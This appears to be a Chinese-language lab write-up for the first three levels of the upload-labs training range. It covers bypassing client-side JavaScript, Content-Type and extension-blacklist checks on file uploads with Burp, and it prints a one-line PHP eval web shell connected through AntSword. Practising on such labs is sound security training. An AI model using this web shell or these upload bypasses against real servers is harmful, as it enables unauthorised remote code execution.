upload-labs笔记
第一关js绕过
漏洞原理:Web应用系统虽然对用户上传的文件进行了校验,但是校验是通过前端javascript代码完成的。由于恶意用户可以对前端javascript进行修改或者是通过抓包软件篡改上传的文件,就会导致基于js的校验很容易被绕过。
1、上传一个php文件,发现没有流量产生,说明前端有js验证,存在js绕过漏洞
2、我们火狐+burp抓包的方法绕过js验证
不过我们要在解题之前做一下准备工作
①火狐设置里面,点击下图的设置,修改里面的选项
②打开burp在火狐浏览器里输入http://burp点击CA下载证书
②下载完成后,在火狐的隐私与安全里找到证书,点击查看证书
导入刚才所下载的证书,接着信任证书即可
工作做好了,但是我打开phpstudy后,开始upload游戏却发现,我的burp不能抓包,原因是有软件占用了8080端口。然后我仔细一想,是我的upload网站占用了这个端口,所以我将这个网站的端口改为8081,问题就解决了。
我们把要上传的php文件的后缀改为可上传文件的后缀就比如png
然后打开火狐代理,打开burp的抓包
最后点击上传
3、抓到这个,把jpg后缀改为php,然后如下图操作
4、最后右键图片新建标签查看图片进行测试
文件夹中也能找到
链接蚁剑,我用的一句话木马是:
1 | <?php @eval($_POST['liangzai']); echo"shuaige"; ?> |
第二关Content-Type(MIME)
查看源代码发现这一关是考content-type绕过
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。(百度)
常见的MIME类型
超文本标记语言文本 .html,.html text/html
普通文本 .txt text/plain
RTF文本 .rtf application/rtf
GIF图形 .gif image/gif
JPEG图形 .jpeg,.jpg image/jpeg
au声音文件 .au audio/basic
MIDI音乐文件 mid,.midi audio/midi,audio/x-midi
RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio
MPEG文件 .mpg,.mpeg video/mpeg
AVI文件 .avi video/x-msvideo
GZIP文件 .gz application/x-gzip
TAR文件 .tar application/x-tar
代码会对上传的文件检测是否是属于image/jpeg image/png image/gif其中之一,是则上传成功,反之无法上传
1、我们在上传php文件的时候进行抓包,右键抓到的包,点击send to repeater。
2、在repeater里面修改content type 为image/png,然后点击send,然后放包即可
然后就能在文件夹里面看见了
蚁剑连接
第三关黑名单绕过
查看源代码发现不允许上传.asp,.aspx,.php,.jsp后缀文件
允许上传.phtml .phps .php5 .pht后缀文件
在phptudy的设置里找到配置文件里面的
在里面添加:AddType application/x-httpd-php .php .phtml 可以解析phtml后缀(也可以添加.php5 .php4等后缀)
修改过后重启服务器
然后将要上传的php文件的后缀改为phtml
或者抓包,将后缀改为phtml就能够上传了